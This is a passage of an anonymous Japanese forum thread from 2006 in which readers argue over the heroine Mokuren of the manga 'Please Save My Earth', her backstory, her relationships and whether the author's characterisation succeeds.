女友達が出来ないのも、キチェだからどうしても特別視してしまったり
男がチヤホヤしちゃうから、嫉妬しちゃうからなんじゃないの?

月基地でも、女子同士しゃべりたくても、男共がまとわりついてるから
お互い上手くコミュニケーション取れなかったんじゃないかしら?
レイープ後も、自分が傷付いた事や紫苑を助ける事で精一杯だったろうし。

ボク月でも、子蟻(アリス)と小梨(桜)だとあんまり頻繁に会ったりしないと思うよ。
両家とも仕事忙しいみたいだし。
あと、輪とありすは、転生してもしきれてない部分があるから
他の皆とは、ビミョーに違うんだと思います。。。

つたない文&長文でスミマセン。


77 :花と名無しさん:2006/08/27(日) 22:41:28 ID:???0
>>71>>73
別にサラブレッド設定なんか付けなくても、
ゆくゆくは最長老にもなれる位の優秀なキチェスなのに、
なぜか恋愛優先でキチェを捨てたがってる変わり者、ってだけでも良かったよね。
月基地に行ってたおかげで最後の一人になっただけでも、
サーチェスのおぼし召しって事で特別なんだし。

78 :花と名無しさん:2006/08/27(日) 22:48:42 ID:???0
>>76
あと、木蓮って基本的に愛情表現が下手だよね。
あれだけ慕う事になった最長老も最初は「頭に来るわ、あのババア」だったし、
セヴ・オルーの件でモードが木蓮のお世話係から降りる事になるまで、
「モードじゃなきゃ嫌!」って言うほどモードを慕ってるように見えなかった。
幼少時の、父親が間違えて描いた楽園の男エリアの地図を
「使うよ!」と言ってた木蓮は素直で可愛かったのに、やはりあの後色々あったのだろうか。

逆に木蓮のそういうあまのじゃくな所を理解出来たからこそ、
あの二人とは本当の信頼関係を築けたのだろうけど。

79 :花と名無しさん:2006/08/27(日) 23:12:08 ID:???0
>>71
モクレンも時々外出してたみたいに楽園から出てるときに
やっちゃったんでね?

80 :花と名無しさん:2006/08/27(日) 23:15:43 ID:???0
>>79
>>71は、「ヤッたらすぐにキチェが消える設定なのに、
どうして両親は木蓮出産まで楽園にいられたのか?」って事が言いたいんじゃ?
そりゃ24時間完全に監視されてる訳ではないのだから、
ヤろうと思えばいくらでもヤレるでしょ。

81 :花と名無しさん:2006/08/27(日) 23:43:59 ID:???0
2人を追い出したら・・・
国の財産であるキチェスなのに、楽園内で2人キチェを失ったら、
楽園(つまり国)は管理責任を問われる。
加えてマスコミが騒ぎ出し、「乱れた『聖地』楽園の実態!」
なんて記事を書かれ、国の危機管理不備を指摘される。
おまけに人権団体が騒ぎ出し、「楽園のキチェス隔離は人権を無視した
非人間的扱い!」なんて糾弾される。
…てなことから追い出すことは出来なかったのだろうと無理矢理考えてみた。

82 :花と名無しさん:2006/08/27(日) 23:51:13 ID:???0
>>77
サラブレッド設定は紫苑に木蓮がただのキチェスではない特異さを
アピールする為に必要だったんじゃない?

83 :花と名無しさん:2006/08/28(月) 08:51:21 ID:???0
まず↑の人がいってる
・サラブレッド効果
(紫苑=戦災孤児・木蓮=楽園生まれ楽園育ち(最高の至福をイメージさせるため)
 という、真逆の人生を強調したかったから。)

・木蓮パパがキチェスじゃなかったら、「地球の大気になりたい」などと思わなかった。
 (「大気ってどうやったらなれるの?父さま・・・」)

・木蓮パパがキチェスじゃなかったら、 木蓮は「月(父さまの瞳の色)に行きたい」と思わなかった。
 となるとメンバとも会うことがなかったことになる。

・両親がキチェスだったからこその流れ↓
両親が祖父母や世間につらくあたられたり苦労する、
両親と引き離され、仲良く暮らせなかった、
キチェスは優越感の塊だと知る、キチェスたちに両親をバカにされる、
キチェスってだけで世間から理不尽な責任を負わされる(パパはキチェスとして弱すぎた)、
「結局、ひたいのキチェがみんないけない」→「こんなの捨ててやる」
→「両親みたいに恋をしたら捨てられる(両親に憧れる)」
→異性を恋愛対象としてみるようになる→紫苑に恋する

キチェに劣等感を覚え、異性を恋愛対象にしようとする、
また、地球に憧れる過程を作るためには
両親が楽園で純愛をし、世間からつらくあたられ→「ひたいのキチェが悪いんだ」という過程と、
両親が苦労をして早死にして→「取り残された涙。KK、お前とわたし少し似てる」
こういう気持ちにさせるために必要な過程だったのでは。

84 :花と名無しさん:2006/08/28(月) 09:19:06 ID:???0
>>82-83
なるほど。後に結ばれる紫苑との比較と、
木蓮の人格形成の背景の為に必要だったのか。
少女時代の木蓮はそこまで深く考えずに、
ただ恋愛や一般人に憧れてるように思えたから。

そういえば、セヴ・オルーを出会ったばかりの時点で
「キチェを捨てさせるくれる人」の候補の一人として考えてたり、
色々な事を語り合ったり助けを求められるような関係になってたのに、
絶縁した後の「友達になれそうだったのよ」に微妙に違和感。
「せっかく友達になれたのに」ならまだ分かるけど。
実は木蓮の友達の基準って相当厳しいんじゃ。そりゃ「友達が出来ない」訳だよね。

85 :花と名無しさん:2006/08/28(月) 09:24:42 ID:???0
もしかして木蓮が月基地メンバーで友達だと思えたのは、
玉と秋くらいだったのだろうか?
紫苑は恋愛感情確定するまでギスギスした関係だったから除外するとして。
しかも上記の二人とも自分に恋愛感情を抱いていたのは気づいてただろうから、
純粋な友情とは微妙に違うだろうし。
やはりちょっと悲しいよね。

86 :花と名無しさん:2006/08/28(月) 10:45:10 ID:???0
>絶縁した後の「友達になれそうだったのよ」に微妙に違和感。
>「せっかく友達になれたのに」ならまだ分かるけど。
>実は木蓮の友達の基準って相当厳しいんじゃ。そりゃ「友達が出来ない」訳だよね。

あ〜それは自分も思った!
違和感あった。
「友達になれそうだったのよ・・」って、
婚約の話しまで持ち出しといて、「友達になれそうだった」ってどうなのよとw


87 :花と名無しさん:2006/08/28(月) 16:44:07 ID:???0
それは出会って次が「ひょうたんなまず・意気地なし!」
最後が「父ちゃんを助けて」だから仕方ないんじゃ?

と思ったけど、衣装が汚れてると咎められてるってことは
何回も抜け出して会ってたってことなんだよね・・・

88 :花と名無しさん:2006/08/28(月) 18:33:24 ID:???0
そういえば「大気になりたい」って
木蓮の口癖のように何度も出てきたけど、
それって木蓮パパが「歌は大気にとける」とか
「愛は光になる」みたいなこと言ってたからだよね?
でもそのあたり読み返してみても、木蓮パパは
歌や愛の話をしてただけで、その話からどうして
「(自分が)大気になりたい」って発想になるのか
よくわからなかった。

89 :花と名無しさん:2006/08/28(月) 20:06:50 ID:???0
>>88
確か木蓮から見て地球は「父様の涙みたい」なんで
抱きしめたいってモノローグなかったっけ?
地球を抱きしめる=地球を包む大気だと思う。

90 :花と名無しさん:2006/08/28(月) 22:31:00 ID:???0
>>86
楽園で他のキチェス達はいつも木蓮の両親の悪口を言っていたけど
恐らくは他の関係者(国の役人やマスコミ関係者、モード以外の侍女達)も
表向きは木蓮に優しくても陰でバカにしていて、祖父母もお金の事しか
考えていないから、それで木蓮は他人を信じられなくなっていたんじゃないかな。
「友達になれそうだったのに」と言ったのは、この時点でやっと
「彼なら大丈夫」と確信出来た意味だと思ったよ。

>>76
>ポク月でも子蟻(アリス)と子梨(桜)だとあんまり頻繁に会ったりしないと思うよ。

そういえば亜梨子は歌手、桜は会社員だったな。子蟻子梨以前に一般の勤め人と芸術家じゃ
時間が合わないしね。


91 :花と名無しさん:2006/08/29(火) 01:16:15 ID:???O
「友達になれそうだった」発言だけど
父ちゃんを助けられなかった、って事だけでシカトするようなあんな野郎は私の本当の友達じゃなかったんだ
…っていう感じでは?

92 :花と名無しさん:2006/08/29(火) 02:11:46 ID:???0
つーか木蓮て嫌われてるんだな。
揚げ足取りのようなイチャもん付けが多くて驚いた。

93 :花と名無しさん:2006/08/29(火) 09:02:58 ID:???0
>>91
読者としてはそういう考えになるだろうけど、
あの時の木蓮はセヴ・オルー個人を責めるような言い方じゃないんだよね。
何にもしてあげられなかった自分、もしくはキチェスというだけで過大な期待をする、
一般人に浸透してる思想、更にもしくはキチェという存在そのものを責めてる感じ。
「どうしてこんな事になってしまったの…?」っていう。

94 :花と名無しさん:2006/08/29(火) 09:10:31 ID:???0
>>92
リアルタイムで読んでた時は回想シーンが入った頃から木蓮に対してもにょってた。
ありすは結構好きなままだったのだけど、今思うとやはり所々突っ込みたい所はあるよね。

最初の事故も「落として大怪我させたありすが全面的に悪いけど、原因は不幸な事故」で片付けられてたけど。
元はと言えばまだ子供の輪にヤキモチ妬くと分かっててわざと意地悪な事を言い、
だから輪はあんな事をしたのに自分のした事は棚にあげて感情に任せてその場で引っぱたいたからなんだよね。
もちろん罪のない植物にあたるのは悪い事だけど、ありすが冷静だったら、
輪を降ろしてからきちんと言い聞かせて説教すれば済む事。

95 :花と名無しさん:2006/08/29(火) 10:30:31 ID:???0
>>92
94さんも書いてる通り、回想シーンで作者が、より人間くさく俗っぽい存在に描いたからね。
決して神聖な女神のような人じゃなくて、たまたまキチェを持っただけの女性なんだよって言いたかったんだと思うけど。


96 :花と名無しさん:2006/08/29(火) 10:55:54 ID:???0
>>95
その人間くさい俗っぽさをどうして共感出来るように描いてくれないのだろう。

うてなの苺の初登場シーンも主人公が一目ぼれする重要シーンなのだから
日渡さん的には魅力的に描いたつもりなんだろうけど、
ただのワガママで調子付いたうるさい女にしか思えなかった。

97 :花と名無しさん:2006/08/29(火) 11:33:05 ID:???0
もくれんの幼少時の話はいらんかった。
あのあたりから絵が壊れていったし。

98 :花と名無しさん:2006/08/29(火) 12:36:59 ID:???0
木蓮には無意識の傲慢さがあったからな〜

99 :花と名無しさん:2006/08/29(火) 13:21:56 ID:???0
美人で頭が良くてキチェでアイドルで・・・という設定がムカツク。
完璧過ぎて賢いだけの美人って感じがするし、
基地の中でも紫苑、秋、玉、柊を手玉に取ってた辺り、
男にチヤホヤされるのを楽しんでるとしか思えない

100 :花と名無しさん:2006/08/29(火) 13:25:00 ID:???0
結局いくら俗っぽく描いても、木蓮自身がコンプレックスとは無縁の
完璧女(性格とかは別として)だから、一般読者が共感しようがないんだよね。

両親の早すぎる死や周囲からの冷たい扱いは可哀相だとは思うけど、
美しく聡明、そして一生生活の心配をしなくて済むキチェスに生まれた自分の運の良さを
否定ばかりせずにもう少し感謝しても良かったのでは。

101 :花と名無しさん:2006/08/29(火) 13:29:27 ID:???0
素直にチビ木蓮可愛いと思って読めてた自分は、ここでは少数派なのかな。
紫苑その他の人の回想シーンと合わせて読めるのも、楽しかったし。
(だからこそ、絵柄の変化は辛かったけど)

102 :花と名無しさん:2006/08/29(火) 14:03:18 ID:???0
チビ木蓮はアッサリと金目当てのジジババについてくようなDQNだし、
モードの評価を貶めてまでセブオルーと遊んでた辺り最低。
セブオルーにシカトされたのも当然の報いかと。
下手に恋愛や地球に夢を持たずに一生キチェスしときゃ良かったのに

103 :花と名無しさん:2006/08/29(火) 15:33:53 ID:???0
>102
>チビ木蓮はアッサリと金目当てのジジババについてく
3歳前後にそれを求めますか・・・


104 :花と名無しさん:2006/08/29(火) 16:59:43 ID:???0
妙な揚げ足取りして木蓮叩きをしてる奴は
まるで原作に出てきた木蓮の陰口言ってた女友達のようだw

105 :花と名無しさん:2006/08/29(火) 17:31:58 ID:???0
>モードの評価を貶めてまでセブオルーと遊んでた辺り最低
ここもちょっと過剰かな。あの時の木蓮は悪いのは自分で、
それによってモードが処分を受けるのはおかしいって考えだったろうし、
いくら楽園と名がついても木蓮にとっては牢獄も同然だったろうから、
外に出てみたいのは当たり前だろう。ただでさえ遊びたい盛りだし。

106 :花と名無しさん:2006/08/29(火) 19:17:22 ID:???0
>>104
木蓮儲乙

107 :花と名無しさん:2006/08/29(火) 19:26:08 ID:???0
自分は>>103->>105に同意だが。
木蓮叩き酷いもんだな。
そこまで主要キャラを憎めるあたり、
おまいさんのぼく地球へのハマり度はかなりのもんだろうな。


108 :花と名無しさん:2006/08/29(火) 21:55:10 ID:???0
でもやっぱ木蓮の描写に人間としての魅力が薄かったのは事実。
「他者からのイメージとは違って欠点もある普通の人間なんだよ」という作者の意図はわかってたけど
彼女の回想に入ってからは作者の力不足が露呈してたと思う。
あんまり内面を書かない作品(ぼく地球以前)は結構好きだった。
あと日本語の痛い間違いが多すぎ。編集もっと気をつけて見てやれよって感じだった。

109 :花と名無しさん:2006/08/29(火) 21:57:21 ID:???0
批判、分析は別に良いと思うけど、リアルで木蓮に嫉妬丸出しな
>>102のような叩きは非常に見苦しい

110 :花と名無しさん:2006/08/29(火) 22:01:18 ID:???0
「ずるい人。自分の気持ちばかり懺悔して私の気持ちなんて知ろうともしない」と
木蓮が語ってたけど、紫苑の本心に気づかない時点でお互い様では。
あんなかすかなテレパスだけじゃ、心の奥までは分からないでしょ。
「じゃああなたの望む通り、理想のキチェスを演じてあげるわ」って辺りも、
やはりプライド高いというか、あくまでも一段上から物言ってるなというか。
その辺の勘違いっぷりがおマヌケで可愛いとも言えなくもないけど。

もちろんテレパスってサーチェスのない一般人相手でも、
本当に知られたくない事は読めないんだよね?
さもなきゃテレパシストは周囲に恐れられまくってしまう。
無防備状態の夢なら自由に見られるのも充分怖いけど。
その辺は本人の良心に任せるしかないのか。

111 :花と名無しさん:2006/08/29(火) 22:17:17 ID:???0
>>96
激しく同意。
健にとって雅より価値のある運命の女がこれか?と思ったよ>苺
むしろ女神キャラの氷樹の登場シーンの方が魅力的に見えたよ。

木蓮も無理に親近感を持たせようとしないで、女神キャラとして描いておけば
かえって読者に共感してもらえたんじゃないの?


112 :花と名無しさん:2006/08/29(火) 22:26:35 ID:???0
日渡さんって自分の気持ちに正直に生きるキャラより、
多少偽善的でも周囲の為に自分を押し殺して耐えるキャラの方が魅力的に描けるのでは。

個人的には、ぼく地球では木蓮よりありすやエンジュ、
うてなでは苺や美夜より氷樹や夜子の方が好き。
初期の涙花も好きだったな。

113 :花と名無しさん:2006/08/29(火) 22:49:09 ID:???0
つまり狙いすぎて失敗したと。

114 :花と名無しさん:2006/08/29(火) 23:10:17 ID:???0
そう言えば紫苑の懺悔で
「あんたを抱くのに口実が必要だった」って言ってたよね?
これってキチェスではなく一人の女として欲情したんだから
木蓮が望んだ通りになったじゃんと当時思った。
木蓮的にはそれの言葉はスルーだったみたいだけど。


115 :花と名無しさん:2006/08/30(水) 00:44:37 ID:???0
狙いすぎつーか欲張りすぎという気がしたな>木蓮
不幸設定・寂しがり・ギャグ・普通人願望・面食い等
一人のキャラにいろんな要素を盛り込みすぎて分裂気味に感じた。

116 :花と名無しさん:2006/08/30(水) 04:54:23 ID:???O
>>94
マンションのベランダの手すりに小さい子が乗っていたら、
球根が落ちようがマイケル(※猫です)が落ちようが、まず子供を保護するのが最優先だよね。
「なんてことするのよっ!」パンッ!
そんなことしといて「輪くんを木蓮が助けてくれました」っておまwwww
あれ、殺人未遂だよね…。
みくろだったら「なんてこと…すんねん…!」といったところかな。
田村さん、ありすに凄んで下さい。

117 :花と名無しさん:2006/08/30(水) 08:07:03 ID:???0
>>116
保護したらマンガが進まんじゃないか。

118 :花と名無しさん:2006/08/30(水) 09:17:45 ID:???0
99>美人で頭が良くてキチェでアイドルで・・・という設定がムカツク。

って木蓮がどんな性格でも駄目って事だよね
本当に漫画の中で嫉妬のみで木蓮を嫌っていた女達のようだ…
まぁリアルで存在してたらそうなんだろうけどさ。

本人の意思は全くといって尊重されず両親の愛を満足に与えられず、
心に闇を抱え孤独だった者同士惹かれあったのが紫苑と木蓮だと思うんだけどね。
ただの女神のままの木蓮なら紫苑は惹かれなかったのではないかな〜

119 :花と名無しさん:2006/08/30(水) 09:39:14 ID:???0
何度も「木蓮を嫌ってた女達と一緒」て言ってるのって同じ人?

女神だったらもっと惚れてた気がする・・・

120 :花と名無しさん:2006/08/30(水) 10:15:55 ID:???0
どんなに生活に困っても両親の愛があれば幸せだと思う

木蓮にとってはキチェ自体いらない物だったの思う
キチェがあった為に、両親から引き離され、過剰な期待をされ
できないと攻められ嫌われて、楽園という特殊な世界で人間関係もままならず
他人から見てどんなに恵まれた環境に見えても、そこにいる事を
望まないに人間にとっては牢獄、
木蓮を普通の人として接していたのは長老とモードだけ
月の仲間も最終的にはキチェの木蓮しか求めてなかった

木蓮が紫苑をキチェの自分しか必要としていないと思い込んでも
仕方ないかなと思う。

木蓮はキチェじゃなく普通の人(女)になりたかったと思う


121 :花と名無しさん:2006/08/30(水) 10:33:09 ID:???0
>>117
確かにw

「ありす!見ろっ!」(ガシャン!)
「輪君っ!」(ありす、輪を抱きとめ部屋に転がるように入る)
「なんて事…するのよ!危ないじゃない!」
「それだけかよ…ありすの大事な球根メチャクチャにしたのに…」
「でも…でも…!輪君の方が大事だもん!」
「…!ありす、ごめん…」
その後、何とか無事だった球根を一緒に植え替え、ラブラブの二人。

「え?前世?何です、それ?」

〜終わり〜

122 :花と名無しさん:2006/08/30(水) 15:16:20 ID:???0
>「ずるい人。自分の気持ちばかり懺悔して私の気持ちなんて知ろうともしない」と
>木蓮が語ってたけど、紫苑の本心に気づかない時点でお互い様では。

その木蓮と紫苑の気持ちのすれ違いを描いた漫画なんだから、
そこに突っ込んでも仕方ないじゃん・・。


123 :花と名無しさん:2006/08/30(水) 15:28:03 ID:???0
>>122
いや、基本的に木蓮って相手を責めてばかりで、
自分はあくまでも被害者って所がその辺にも現れてるなと。
木蓮を騙してレイプした事に関しては責めて当然なのに、
あまりそうしてないのも不思議だし。

124 :花と名無しさん:2006/08/30(水) 15:54:55 ID:???0
木蓮は本当にむかつくキャラだね。
美人で賢くてエリートで、その上、一生安泰で身分もある
キチェなのに、いつもいつもキチェを疎んじてばかりで見てて腹たった。
可愛いお嫁さんになるのが夢だとか、甘えすぎ。
木蓮さえいなければ玉とエンジュは結ばれてたし、紫苑と
玉が仲違いすることもなかったし、秋が罪に苦しむこともなかった。
モードも木蓮の身勝手のせいで降格になったし、木蓮の存在自体が害悪だな。

125 :花と名無しさん:2006/08/30(水) 16:02:35 ID:???0
木蓮のせいで不幸になった人

・玉蘭…木蓮のどっちつかずな態度のせいで報われない片思いをする羽目になる。
    そのせいで何だかんだで親友の紫苑とは仲違い。
    木蓮さえいなければエンジュと支えあい、愛し合っていた。
    来世でも思わせぶりなしたたかな木蓮(アリス)の態度のせいで、
    期待させられて突き落とされるという目に遭わされる。

・紫苑…木蓮のせいで秋に逆恨みされて9年間も孤独を味わう羽目になった。
    しかも木蓮発病後、木蓮のワガママで殺されかけるし、木蓮の
    身勝手な願いのせいで9年も孤独を味わった。
    来世でも木蓮のせいで子供の頃から辛い記憶を所有するはめになり、
    何度も重症を負う原因にもなった。

以下めんどいので略。

126 :花と名無しさん:2006/08/30(水) 16:12:14 ID:???0
>>124,125

大賛成!!!

127 :花と名無しさん:2006/08/30(水) 16:35:43 ID:???0
モード…一生懸命木蓮につくしてきたのに、嘘をつかれて裏切られる。
    その結果、仕事上で最悪な評価をつけられてしまう羽目に。
    また、やたら反抗期を主張したがる木蓮のせいで、他の仕事仲間から
    お守役である自分まで頭のイカれた人物と思われていた可能性大。

128 :花と名無しさん:2006/08/30(水) 16:47:53 ID:???O
はいはい、
もうわかったから



129 :花と名無しさん:2006/08/30(水) 16:48:31 ID:???0
木蓮の不幸はキチェもって生まれてきたこと
これが不幸の元凶
なければ両親と幸せに暮せた
女性からもこんなに嫌われなくてすんだのに


130 :花と名無しさん:2006/08/30(水) 17:40:16 ID:???0
で輪が再び狂いだすの、まだ?

131 :花と名無しさん:2006/08/30(水) 17:40:28 ID:???0
てか、みんなを幸せにするはずのキチェサージャリアンがみんなを不幸にしてるよね。

132 :花と名無しさん:2006/08/30(水) 18:03:30 ID:???0
キチェサージャリアンはみんなを幸せになんてできるわけがない
できるのは植物を成長させたり枯らしたりする事だけ
幸せにできるというのはキチェを持たない人の思い込み

133 :花と名無しさん:2006/08/30(水) 18:17:00 ID:???0
木蓮がベランダに乗ってる輪よりまだ死んだ(枯れた)とは限らない植物を
優先したかのような不自然な行動を、「彼女は植物の気持ちが分かる特別な人間」
って事で説得力を持たせたのかもしれないけど。

悲しみながらとは言え、生きる為に植物を食べる事を受け入れてる時点で
人>>>>>植物という思考になってるはずだけど。
それも木蓮の時の話で、ありすになってからはあまりそういう発想もなさそうだし。
そういやありすの大好物の豆腐って、
擬人化すると「赤ちゃんの絞り汁を固めた物」なのか。なんかグロいなw

134 :花と名無しさん:2006/08/30(水) 19:30:59 ID:???0
ここまで劣化した漫画家って他にいる?

135 :花と名無しさん:2006/08/30(水) 19:53:06 ID:???0
>>115
>狙いすぎつーか欲張りすぎという気がしたな。>木蓮

言われてみれば、その通りだな。

木蓮に詰め込まれた不幸設定・寂しがり・ギャグ・普通人願望・面食い等の条件の内
夜子は寂しがり、氷樹は不幸設定・寂しがりだけだったから破綻しなくてすんだんだな。

>>134
槇村さとるは少なくともストーリーやキャラ設定が破綻しているよ。
主人公達がやたら説教くさくて「それって変!」と言っているけれど、
「変なのはあんた達の方だよ!」と突っ込みたくなってくるよ。

136 :花と名無しさん:2006/08/30(水) 22:54:47 ID:???0
紫苑は最後の方になって木蓮に弱い部分とかラズロの事とか
本音を語ってたけど、木蓮は紫苑にそういう事してないよね?
あの話し合いの時点で、「キチェスでいてあげる」なんて
変にプライド保とうとないで、モードに怒鳴ってた時ぐらい
本音をさらけ出してたらもっとお互い理解が深まっただろうに。
二人きりになってから紫苑が無理して優しくしてくれてるって
言ってたけど、木蓮の方が無理してたんじゃないのかなぁ。

137 :花と名無しさん:2006/08/30(水) 23:04:42 ID:???0
>>136
紫苑が求めているのが「キチェスである自分」だと勘違いしたからしょうがない。
あそこで理解が深まったら前世から引き継いだ現世でのすれ違いも描けなくなる。
前世で「理解しあえなかった」事がマンガでの重要要素でしょうに。

138 :花と名無しさん:2006/08/30(水) 23:51:37 ID:???0
木蓮叩き、必死すぎだな。
全部、あとからの無理やりなこじつけなのが笑える。
上のほうで、リアルにあの女友達と似てるって言われてるの頷ける。

木蓮叩きに必死な香具師が書いてる「木蓮さえいなければ」こそが、
「自分が一番」のわがまま身勝手な発想じゃないかw
突っ込みどころ満載なわけだが、面倒なんで一応そこ一箇所だけ突っ込んでおくw
見苦しすぎるから、全部は読む気はしなかったが、
痛々しい必死な叩きは脳内だけでやってくれ。
好きな作品ならなおさらな。


139 :花と名無しさん:2006/08/31(木) 00:56:46 ID:???O
なんだなんだ?
急に必死な人が来た
みんなは漫画のキャラについて感じたこと話してるだけじゃないの?
木蓮叩きなんて別に誰もしていないと思うけど…
自分と同じ感じ方の人しか認められないのなら、2ちゃんに来ないほうがいいかもよ

煽りではないです
気を悪くしたらごめん

140 :花と名無しさん:2006/08/31(木) 00:59:37 ID:???0
ぼく地球は名作だと思う。
だがそのあとは…orz
なんか苦労して話を作ることを放棄した印象を受ける。

141 :花と名無しさん:2006/08/31(木) 01:25:07 ID:???0
>>134
頂上が低いので日渡さんと比べるのは気がひけますが…2名
中山★香、河惣益巳。

大御所クラスで労害な作家
最終章の紅天女編に入った頃から劣化禿しい→ミウッチ
絵もストーリーもダメダメ。・゚・(ノД`)・゚・。
奥様が亡くなられてから、タガが外れたごとく転落していく→和田慎二

>>135
末期の劣化、禿胴衣。

142 :花と名無しさん:2006/08/31(木) 01:40:47 ID:???0
かつて愛した漫画家やら作家が次々と劣化していくのを見ていると
月日とはかくも残酷なものかと思う…

143 :花と名無しさん:2006/08/31(木) 01:43:19 ID:???0
>>138
木蓮は誰が見ても嫌なキャラでしょ。
私の周囲でも男女問わず木蓮ムカツクって人ばっかりだし。
実際に木蓮がいなければ基地内でも皆仲良く過ごせたし、
モードも酷い評価を受けなかったのは事実。
それにアリスにしたって、アリスさえいなければ輪は酷い目に
あわずに済んだしトラウマに悩まされることもなかった。
全ての原因になってるくせに、自己中なところが嫌われてるんだと思う。
そんなイヤなキャラなのに美人で聡明で特殊能力があって・・・ってのも癪に障るな

144 :花と名無しさん:2006/08/31(木) 01:51:10 ID:???0
怖い

145 :花と名無しさん:2006/08/31(木) 01:52:31 ID:???0
木蓮に陰口言ってるのを聞かれた友達面してた人達の意見みたいだ。

146 :花と名無しさん:2006/08/31(木) 02:13:47 ID:???0
あれだけヒットした作品だから(アニメ化もしたし)、ヒロインを嫌う人がいても
おかしいとは思わないが…。
ラスト1行は単なる僻みに見えてしまうから、あまり考えない方がいいよ。
世の中色々なタイプの人間がいてこそ、愛憎劇が生まれる。
みんなが性格良かったら、つまらないしねぇ。

漫画大好きだけど2chに出入りするまでは、キャラの性格や行動を
こんなに掘り下げて考えたり、本当に隣にいる人間を語るかのように
熱くなる人がいるのを知って、ある意味勉強になった。
現実の生活でも漫画や小説のキャラ達の言動・行動で失敗があったら
二の舞踏まないようにしなきゃ〜って、思うようになったよ。

147 :花と名無しさん:2006/08/31(木) 03:07:26 ID:???O
(とっくみあいをした後のマヤと亜弓のように爽やかに)
みんなぼくチキが好きなんだなぁ、あっはっは
でいいじゃん、普通に


>>146
アンカーつけて

148 :花と名無しさん:2006/08/31(木) 04:15:28 ID:???0
マンガのヒロインなんて好きと嫌いがはっきりわかれるよ。
ただ、ちょっとこじつけすぎというか「それを言っちゃこの作品成立しない」レベルの事を
言ってる人も多いけどな…。ここ数日ヒドス。

149 :花と名無しさん:2006/08/31(木) 05:55:57 ID:???0
>>148
「それを言っちゃこの作品成立しない」のを分かった上で、そのキャラを叩いてても?
ストーリー上の悪役とかみんなそんな感じでしょ。
ただ、木蓮の場合はそれが悪役ポジションではなくヒロインであり、
作中では(というか作者的には)マンセーされてるから、その違和感も含めて叩いてる訳で。

自分もその一人だけど、木蓮や苺を嫌ってる人は日渡さんと感性が違うのだと割り切ってる。
もちろん共感出来る部分もあるから読んでるんだけど。

150 :花と名無しさん:2006/08/31(木) 08:13:03 ID:???0
>>125
玉って木蓮がいなくてもエンジュの方を振り向いてたかどうか分からんなー…。
別に女神見出しそう。

151 :花と名無しさん:2006/08/31(木) 09:16:12 ID:???0
>>150
玉ってココと6年も付き合ってて「やる事が限界を超えたから」
別れるような人だからねえ。
別れた後あそこまでボロクソ言うならもっと早く別れるか、
そこまで我慢してたなら良い所も一杯知ってるはずなのだから
最後まで付き合えよと思うけど。

その後エンジュにどんな慰められ方をされたか分からないけど、
木蓮に出会った途端そんなエンジュをそっちのけで一目ぼれする辺り、
元々女を見る目がないというか、自分を省みず変な理想しか追い求めてないのかも。

迅八が未だに独身なのも、ありすに未練があるという他にその辺も関係してそう。

152 :花と名無しさん:2006/08/31(木) 09:38:36 ID:???0
玉は、エンジュはずっと自分を待っててくれるって安心して
都合よく扱ってるよね。現実でもこういうタイプの男っていそう。
紫苑も「コイツを許せるのは母親ぐらいだろ」って思ってたけど、
母性的な愛で接してくれてたエンジュこそ、ちゃんと付き合って
みたら玉だけの女神になってくれたかもしれないのに。
ホント女見る目がないというか、自分に合う相手をわかってない。

153 :花と名無しさん:2006/08/31(木) 10:03:49 ID:???O
>>148 同意。
日常対人関係の不満がバックにあるようで、読んでて疲れた。

154 :花と名無しさん:2006/08/31(木) 10:26:32 ID:Rpg1k/jQ0
>>115
「不幸な生い立ち」と「普通っぽい部分(メンクイ、ギャグ)」がうまく噛みあってない感じがする。
赤毛のアンみたいに不幸ゆえにバカみたいに明るい、というわけでもないし。


155 :花と名無しさん:2006/08/31(木) 10:30:06 ID:???0
>>152
エンジュ自身はそこまで考えて男に転生した訳じゃないだろうけど、結果的に正解だったよね。
もし一成が女だったら中途半端に迅八に都合良く扱われて、
一生新しい恋愛に踏み出せなさそうだ。
桜は表面上は軽いけど本当に好きな相手には一途だろうから、その点も心配なさそうだし。

156 :花と名無しさん:2006/08/31(木) 13:31:27 ID:???0
最初の会合で桜が勘違いしていた通り、
木蓮の来世が一成でエンジュの来世がアリスなら、
ここまで話がこじれることもなかったのになぁ。
迅八はアリスとくっついて、輪は一成が男だから
諦めて普通の恋に生きてただろうし。

157 :花と名無しさん:2006/08/31(木) 14:06:45 ID:???0
>>156
迅八が中身エンジュのありすを好きになるのか?と思ったけど、
迅八だけは「(好きなのは木蓮でなく)坂口さんだよ」と言ってるんだよね。
でもそれだって、やはり前世が木蓮だったからかもしれないし、
迅八が一成を振ったのも男だからっていうのがメインの理由じゃないらしいし。うーん。

そもそも木蓮ほどではなくても充分美人で優しくて自分だけを何年も愛してくれる
エンジュじゃなぜダメだったのかの理由がまるで分からない。
ココと付き合ってた頃は仕方ないとしても、別れた後どうしてくっつかなかったのか。
それとも玉蘭もまんざらでもないと思い始めた頃に、タイミング悪く木蓮と出会ってしまったのか?

158 :花と名無しさん:2006/08/31(木) 14:22:27 ID:???0
>>157
タイミング悪く木蓮と出会っちゃったってのもあると思うけど、
男の本能として「コイツはいつでもいける」と思っちゃうと
他に目がいっちゃうってのもあるんじゃない?狩猟本能というか。
(もちろん、そうでない一途な男もいるけども。)
玉とエンジュはヤッたりもしてたわけだし、エンジュのこと女として
見てないわけじゃなかったんだろうから、木蓮とか他に目のいく女が
いなかったら最終的にはくっついてたかもしれないけど、どうだかね。

159 :花と名無しさん:2006/08/31(木) 14:43:13 ID:???0
木蓮への気持ち

紫苑…前から意識してはいたが、それが恋だとはレイープするまで気づかず。
   木蓮をキチェスだと表面では意識していたが、素ではあまり気にしてなかったっぽい。
   元々信仰心が薄いので、キチェスを奪う事にもさして抵抗は感じず。

玉…木蓮=キチェスであり、理想の女神。当然ヤリたいなんて考える事すらはばかられる。
  信仰心も月基地メンバーの中では強い方?

秋…木蓮=キチェスとしての意識は玉と変わらないが、内心汚したい(ヤリたい)と思ってた。
  多少背徳的な感情もあり?

って感じだろうけど、仮に木蓮が選んだのが玉や秋だとしたら、
実際に木蓮とヤッたのかどうか気になるな。他のメンバーの手前もあるだろうし。
何となく柊はパスワードの件からしても良く言えば責任感が強い、
悪く言えばクソ真面目で頑固だろうから、仮に母星消滅後でも
「サージャリムは見てる」とか言って手を出さなそうだけど。

160 :花と名無しさん:2006/08/31(木) 15:07:27 ID:???O
ごめん誰か教えて

エンジュがギョクとえっちしたのはどのタイミング?

161 :花と名無しさん:2006/08/31(木) 15:22:05 ID:???0
昔は好きだったんだけど
もう「作者の自キャラ萌え」が読んでて辛い。
ボク月も、やれ天才だのイケメンだの美人だのの羅列で
よくまぁ毎回毎回褒めちぎれるなと……

